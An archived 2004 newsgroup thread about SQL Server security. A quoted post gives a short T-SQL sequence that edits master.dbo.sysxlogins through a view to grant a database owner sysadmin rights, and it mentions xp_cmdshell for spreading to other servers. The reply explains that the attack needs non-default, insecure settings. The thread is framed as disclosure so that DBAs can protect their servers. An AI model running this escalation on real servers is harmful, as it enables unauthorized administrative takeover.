Re: Give yourself SQL Administrator rights

From: Sue Hoegemeier (Sue_H_at_nomail.please)
Date: 06/10/04 

Date: Wed, 09 Jun 2004 20:40:02 -0600

Even if you change the default settings to allow updates to
the system table, someone would have had to grant
permissions to this user on sysxlogins. Public does not have
permissions to select from sysxlogins. Only members of
sysadmin can select from this table by default.
Allow updates is set to 0 by default (disabled by default)
Only members of the server roles sysadmin and serveradmin
can execute sp_configure to change allow updates to 1
(enabled).
In terms of Cross DB Ownership Chaining, books online has
security implications with this documented and it has it
documented that it is not recommended to enable this.
So you'd have to leave a lot of things open and change
permissions in master in order to allow this.
Opening up potential security risks by changing default
settings, permissions can result in many problems. It's not
necessarily something new.

-Sue

On Wed, 09 Jun 2004 23:46:35 GMT, "New SQL Administrator"
<nospam@telus.net> wrote:

>Has this been documented before? Try this on a SQL Server instance where
>the 'Cross DB Ownership Chaining' and 'allow updates' options are enabled
>via sp_configure.
>
>Start with a SQL Server login that is not a SQL Administrator but is the
>database owner of the current database.
>
>
>create view dbo.my_sysxlogins
>as
>select *
>from master.dbo.sysxlogins
>
>select name,xstatus & 16
>from dbo.my_sysxlogins
>where name = system_user
>
>update dbo.my_sysxlogins
>set xstatus = xstatus ^ 16
>where name = system_user
>
>select name,xstatus
>from dbo.my_sysxlogins
>where name = system_user
>
>The account should now be a SQL Administrator. If you servers on the
>network share the same domain service account, xp_cmdshell may be then used
>to become an SQL Administrator on those servers.
>
>This posting is made to bring this knowledge in the public realm so that
>corrections may be made. SQL Server DBAs may wish to disable 'allow
>updates' and/or 'Cross DB Ownership Chaining' to protect any SQL Server
>databases that they manage.
>
>a1b42436@telus.net
>
>
>

Relevant Pages

  • Re: Programmatically Altered IIS Security?
    ... I now have the web server running with ... accidentally turned off the automatic updates. ... > inclined to suspect directory/file level permissions problems. ... > had been assigned read only permission to the wwwroot file system. ...
    (microsoft.public.inetserver.iis.security)
  • Re: AdventureWorks scripts
    ... Regarding permissions you should verify that the user you're looking into has at least CREATE DATABASE permissions, but for you're purposes you'll probably have CONTROL SERVER which includes the other. ... If you're working with SQL Server 2008, you would have configured this during installation of SQL Server and it is likely the same user as the person who did the installation. ...
    (microsoft.public.sqlserver.programming)
  • Re: Roles - Users
    ... Developer is a domain level group. ... On the database server, there are legacy ... association with the legacy domain permissions on the server. ... Erland Sommarskog, SQL Server MVP, esquel@xxxxxxxxxxxxx ...
    (microsoft.public.sqlserver.security)
  • Security strategy: Access client/SQL Server
    ... I will be creating an application using MS Access as a client to SQL ... SQL Server resides. ... permissions for group X to open form A, users would need to get a new ...
    (comp.databases.ms-access)
  • Re: Copy Database Wizard Fails to Copy Files
    ... Probably is permissions. ... Share on Server B when you are logged in with the proper account. ... Moving SQL Server ... >>> Put the database Test in single user mode.......Ok ...
    (microsoft.public.sqlserver.dts)
Quantcast